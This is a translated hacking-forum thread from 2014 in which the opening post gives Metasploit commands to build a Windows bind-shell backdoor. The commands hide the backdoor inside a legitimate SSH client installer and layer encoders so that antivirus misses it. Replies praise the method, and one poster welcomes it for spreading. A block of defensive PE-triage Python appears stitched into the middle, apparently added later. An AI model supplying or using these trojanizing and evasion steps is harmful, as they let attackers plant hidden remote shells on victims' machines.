Indonesian Back|Track Team

Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-15-2014

OK, this time I will explain how to get a backdoor past all antivirus products.

Goal:
Antivirus protects machines from malware, but not from all of it: there are ways to pack malware so that it is harder to detect. Here we use Metasploit to make the malware completely invisible to antivirus.

Start the postgresql and metasploit services

Code:
service postgresql start
service metasploit start

Creating Listener


Code:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

[Image: image.png]

listen.exe will be saved in the /root folder

Encoding Listener

Code:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

evil_ssh.exe will be saved in the /root folder

Code:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

The /root folder will now contain listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe

After that, scan the backdoor we have created at:
https://www.virustotal.com


The result:

[Image: image.png]


Thank you.
Sorry if this is a repost.
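
For defenders triaging files like the ones produced in the post above: in-place decoders such as x86/shikata_ga_nai rewrite their own bytes as they run, so the stub needs memory that is both writable and executable. The following is an added example, not part of the original post; the sample headers are constructed, the `.xyz` section name is made up, and the two heuristics are assumed triage rules rather than a guarantee of detection.

```python
import struct
EXEC, WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE

def pe_sections(data):
    """Return (entry_rva, [(name, vaddr, vsize, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off, = struct.unpack_from("<I", data, 0x3C)       # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsect, = struct.unpack_from("<H", data, pe_off + 6)
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)
    entry, = struct.unpack_from("<I", data, pe_off + 24 + 16)  # AddressOfEntryPoint
    table = pe_off + 24 + opt_size                       # first section header
    sections = []
    for i in range(nsect):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append((name, vaddr, vsize, chars))
    return entry, sections

def findings(data):
    """Heuristic flags (assumed triage rules, not proof of malice)."""
    entry, sections = pe_sections(data)
    out = []
    for idx, (name, vaddr, vsize, chars) in enumerate(sections):
        if chars & EXEC and chars & WRITE:
            out.append(f"{name}: writable and executable")
        last = idx > 0 and idx == len(sections) - 1
        if last and vaddr <= entry < vaddr + max(vsize, 1):
            out.append(f"{name}: entry point in last section")
    return out

def build_sample(sections, entry):
    """Constructed header-only PE32 image; sample input, not a real file."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<HBBIIII", opt, 0, 0x10B, 0, 0, 0, 0, 0, entry)
    table = b"".join(n.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vs, va, 0, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return bytes(dos) + coff + bytes(opt) + table

TEXT, DATA = (b".text", 0x1000, 0x800, 0x60000020), (b".data", 0x2000, 0x200, 0xC0000040)
CLEAN = build_sample([TEXT, DATA], 0x1100)
SUSPECT = build_sample([TEXT, DATA, (b".xyz", 0x3000, 0x400, 0xE0000020)], 0x3010)
```

Either flag alone also appears in legitimate packed software, so treat a hit as a reason to check the file's hash and signature against the vendor's original, not as a verdict.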



RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - czeroo_cool - 08-15-2014

Damn, how come it isn't detected as a virus now? I used 4 encoders, the same as you, and back then it got flagged as a virus. ahahah +1 from me


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-16-2014

(08-15-2014, 07:19 PM)czeroo_cool Wrote: Damn, how come it isn't detected as a virus now? I used 4 encoders, the same as you, and back then it got flagged as a virus. ahahah +1 from me

Thanks bro....
it's cool now bro... it just keeps getting better...


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - wine trochanter - 08-16-2014

+1 from me
nice one bro
I'll just make it compile automatically later, OK? :D


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-18-2014

(08-16-2014, 10:30 PM)wine trochanter Wrote: +1 from me
nice one bro
I'll just make it compile automatically later, OK? :D

thanks bro..
ok bro, that's right, to make it easy.....


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - dimascyber4rt - 08-20-2014

wow, this is great for spreading around haha.. thanks for the tutorial bro hehe..


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - kunang - 08-20-2014

Great tutorial.... I got beaten to the start again..
Oy oy oyyyy... keep collecting the tutorials; once I'm done with KKN I want to come over to the base to learn and tinker together again


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-21-2014

(08-20-2014, 07:05 AM)kunang Wrote: Great tutorial.... I got beaten to the start again..
Oy oy oyyyy... keep collecting the tutorials; once I'm done with KKN I want to come over to the base to learn and tinker together again

come on, help me out on 5-6 September 2014....

(08-20-2014, 06:10 AM)dimascyber4rt Wrote: wow, this is great for spreading around haha.. thanks for the tutorial bro hehe..

ok bro, you're welcome, go ahead and try it out bro...


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - 4uth0r1ty - 10-12-2015

So, can this be done for an APK too?


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - alle zaen - 10-14-2015

nice, I'll try it out right away.
Thanks... :)